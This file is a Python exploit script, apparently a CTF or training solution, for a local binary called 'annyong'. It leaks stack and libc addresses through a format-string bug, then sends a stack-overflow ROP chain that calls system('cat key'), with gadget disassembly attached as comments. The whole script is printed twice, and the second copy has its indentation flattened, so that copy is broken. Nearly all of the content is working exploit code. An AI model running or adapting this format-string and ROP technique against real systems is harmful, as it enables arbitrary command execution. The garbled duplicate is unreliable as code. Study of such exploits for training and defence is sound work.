potetisensei/solve.py

## solve.py
import sys

sys.path.append("/home/poteti/pwntools/")

from pwn import process
from struct import pack, unpack

def read_addr_packed(packed_addr):
    return unpack("<Q", packed_addr + "\x00" * (8 - len(packed_addr)))[0]

def send_read_format(process, read_addr):
    process.send("%7$saaaa" + pack("<Q", read_addr) + "\n")
    return read_addr_packed(p.recv().split("aaaa")[0])

p = process("/home/poteti/training/annyong-fmtstr/annyong")

p.send("%4$p\n")
buf = int(p.recv()[:-1], 16) # buf == $rbp - 0x810 == rsp

p.send("%265$p\n")
return_addr = int(p.recv()[:-1], 16) # return: 0x1127

base_addr = return_addr - 0x1127

__libc_start_main_got_plt = base_addr + 0x202050 # __libc_start_main@got.plt:0x202050

__libc_start_main = send_read_format(p, __libc_start_main_got_plt)

'''
i = 0
system = None
while i < 160000:
     print "offset:", i

     signature = send_read_format(p, __libc_start_main+i) # signature: "\x53\x48\x83\xec YY \x48\x85\xff"
     length = len(signature)
     index = signature.find("\x53\x48\x83\xec")

     if index != -1 and signature[index+5:index+8] == "\x48\x85\xff":
         system = __libc_start_main+i+index
         break
     else :
         i += length
     i += 1
'''

system = __libc_start_main + 149024

print "base address:", hex(base_addr)
print "__libc_start_main@got.plt:", hex(__libc_start_main_got_plt)
print "__libc_start_main:", hex(__libc_start_main)
print "system:", hex(system)
print ""

ROP1 = base_addr + 0xfe3
ROP2 = base_addr + 0x1086
cmd_addr = buf+0x848

payload = ""
payload += "a"*0x810 # padding
payload += pack("<Q", buf+0x830) # rbp1
payload += pack("<Q", ROP1) # 0x4(rbp1)
payload += pack("<Q", cmd_addr) # -0x10(rbp1) == buf
payload += pack("<I", 0xdeadbeef) # -0x08(rbp1) is not used
payload += pack("<I", 0xdeadbeef) # -0x04(rbp1) == fd
payload += pack("<Q", buf+0x840) # rbp2
payload += pack("<Q", ROP2) # 0x4(rbp2)
payload += pack("<Q", system) # 0x8(rbp3)
payload += "cat key\x00\n" # cmd

p.send(payload)
p.recv()
print p.recv()

"""
ROP shellcode

mov rsi, -0x10(rbp1):
    0fe3:       48 8b 45 f0             mov    -0x10(%rbp),%rax
    0fe7:       48 c7 45 e8 ff ff ff    movq   $0xffffffffffffffff,-0x18(%rbp)
    0fee:       ff
    0fef:       48 89 c2                mov    %rax,%rdx
    0ff2:       b8 00 00 00 00          mov    $0x0,%eax
    0ff7:       48 8b 4d e8             mov    -0x18(%rbp),%rcx
    0ffb:       48 89 d7                mov    %rdx,%rdi
    0ffe:       f2 ae                   repnz scas %es:(%rdi),%al
    1000:       48 89 c8                mov    %rcx,%rax
    1003:       48 f7 d0                not    %rax
    1006:       48 8d 50 ff             lea    -0x1(%rax),%rdx
    100a:       48 8b 4d f0             mov    -0x10(%rbp),%rcx
    100e:       8b 45 fc                mov    -0x4(%rbp),%eax
    1011:       48 89 ce                mov    %rcx,%rsi
    1014:       89 c7                   mov    %eax,%edi
    1016:       e8 e5 fa ff ff          callq  b00 <write@plt>
    101b:       c9                      leaveq
    101c:       c3                      retq

mov rdi, rsi:
    1086:       48 89 f7                mov    %rsi,%rdi
    1089:       c3                      retq

system(rdi):
   push   %rbx
   sub    $0x10,%rsp
   test   %rdi,%rdi
   je     0x7ffff7a573f0 <system+32>
   mov    0x381d74(%rip),%eax        # 0x7ffff7dd9154
   test   %eax,%eax
   jne    0x7ffff7a5740a <system+58>
   add    $0x10,%rsp
   pop    %rbx
   jmpq   0x7ffff7a56ef0
   xchg   %ax,%ax
   lea    0x13d0d4(%rip),%rdi        # 0x7ffff7b944cb
   callq  0x7ffff7a56ef0
   test   %eax,%eax
   sete   %al
   movzbl %al,%eax
   add    $0x10,%rsp
   pop    %rbx
   retq
   mov    %rdi,0x8(%rsp)
   callq  0x7ffff7b19db0
   mov    0x8(%rsp),%rdi
   mov    %eax,%ebx
   callq  0x7ffff7a56ef0
   mov    %ebx,%edi
   mov    %eax,0x8(%rsp)
   callq  0x7ffff7b19e10
   mov    0x8(%rsp),%eax
   jmp    0x7ffff7a57404 <system+52>
"""
	import sys

	sys.path.append("/home/poteti/pwntools/")

	from pwn import process
	from struct import pack, unpack

	def read_addr_packed(packed_addr):
	return unpack("<Q", packed_addr + "\x00" * (8 - len(packed_addr)))[0]

	def send_read_format(process, read_addr):
	process.send("%7$saaaa" + pack("<Q", read_addr) + "\n")
	return read_addr_packed(p.recv().split("aaaa")[0])

	p = process("/home/poteti/training/annyong-fmtstr/annyong")

	p.send("%4$p\n")
	buf = int(p.recv()[:-1], 16) # buf == $rbp - 0x810 == rsp

	p.send("%265$p\n")
	return_addr = int(p.recv()[:-1], 16) # return: 0x1127

	base_addr = return_addr - 0x1127

	__libc_start_main_got_plt = base_addr + 0x202050 # __libc_start_main@got.plt:0x202050

	__libc_start_main = send_read_format(p, __libc_start_main_got_plt)

	'''
	i = 0
	system = None
	while i < 160000:
	print "offset:", i

	signature = send_read_format(p, __libc_start_main+i) # signature: "\x53\x48\x83\xec YY \x48\x85\xff"
	length = len(signature)
	index = signature.find("\x53\x48\x83\xec")

	if index != -1 and signature[index+5:index+8] == "\x48\x85\xff":
	system = __libc_start_main+i+index
	break
	else :
	i += length
	i += 1
	'''

	system = __libc_start_main + 149024

	print "base address:", hex(base_addr)
	print "__libc_start_main@got.plt:", hex(__libc_start_main_got_plt)
	print "__libc_start_main:", hex(__libc_start_main)
	print "system:", hex(system)
	print ""

	ROP1 = base_addr + 0xfe3
	ROP2 = base_addr + 0x1086
	cmd_addr = buf+0x848

	payload = ""
	payload += "a"*0x810 # padding
	payload += pack("<Q", buf+0x830) # rbp1
	payload += pack("<Q", ROP1) # 0x4(rbp1)
	payload += pack("<Q", cmd_addr) # -0x10(rbp1) == buf
	payload += pack("<I", 0xdeadbeef) # -0x08(rbp1) is not used
	payload += pack("<I", 0xdeadbeef) # -0x04(rbp1) == fd
	payload += pack("<Q", buf+0x840) # rbp2
	payload += pack("<Q", ROP2) # 0x4(rbp2)
	payload += pack("<Q", system) # 0x8(rbp3)
	payload += "cat key\x00\n" # cmd

	p.send(payload)
	p.recv()
	print p.recv()

	"""
	ROP shellcode

	mov rsi, -0x10(rbp1):
	0fe3: 48 8b 45 f0 mov -0x10(%rbp),%rax
	0fe7: 48 c7 45 e8 ff ff ff movq $0xffffffffffffffff,-0x18(%rbp)
	0fee: ff
	0fef: 48 89 c2 mov %rax,%rdx
	0ff2: b8 00 00 00 00 mov $0x0,%eax
	0ff7: 48 8b 4d e8 mov -0x18(%rbp),%rcx
	0ffb: 48 89 d7 mov %rdx,%rdi
	0ffe: f2 ae repnz scas %es:(%rdi),%al
	1000: 48 89 c8 mov %rcx,%rax
	1003: 48 f7 d0 not %rax
	1006: 48 8d 50 ff lea -0x1(%rax),%rdx
	100a: 48 8b 4d f0 mov -0x10(%rbp),%rcx
	100e: 8b 45 fc mov -0x4(%rbp),%eax
	1011: 48 89 ce mov %rcx,%rsi
	1014: 89 c7 mov %eax,%edi
	1016: e8 e5 fa ff ff callq b00 <write@plt>
	101b: c9 leaveq
	101c: c3 retq

	mov rdi, rsi:
	1086: 48 89 f7 mov %rsi,%rdi
	1089: c3 retq

	system(rdi):
	push %rbx
	sub $0x10,%rsp
	test %rdi,%rdi
	je 0x7ffff7a573f0 <system+32>
	mov 0x381d74(%rip),%eax # 0x7ffff7dd9154
	test %eax,%eax
	jne 0x7ffff7a5740a <system+58>
	add $0x10,%rsp
	pop %rbx
	jmpq 0x7ffff7a56ef0
	xchg %ax,%ax
	lea 0x13d0d4(%rip),%rdi # 0x7ffff7b944cb
	callq 0x7ffff7a56ef0
	test %eax,%eax
	sete %al
	movzbl %al,%eax
	add $0x10,%rsp
	pop %rbx
	retq
	mov %rdi,0x8(%rsp)
	callq 0x7ffff7b19db0
	mov 0x8(%rsp),%rdi
	mov %eax,%ebx
	callq 0x7ffff7a56ef0
	mov %ebx,%edi
	mov %eax,0x8(%rsp)
	callq 0x7ffff7b19e10
	mov 0x8(%rsp),%eax
	jmp 0x7ffff7a57404 <system+52>
	"""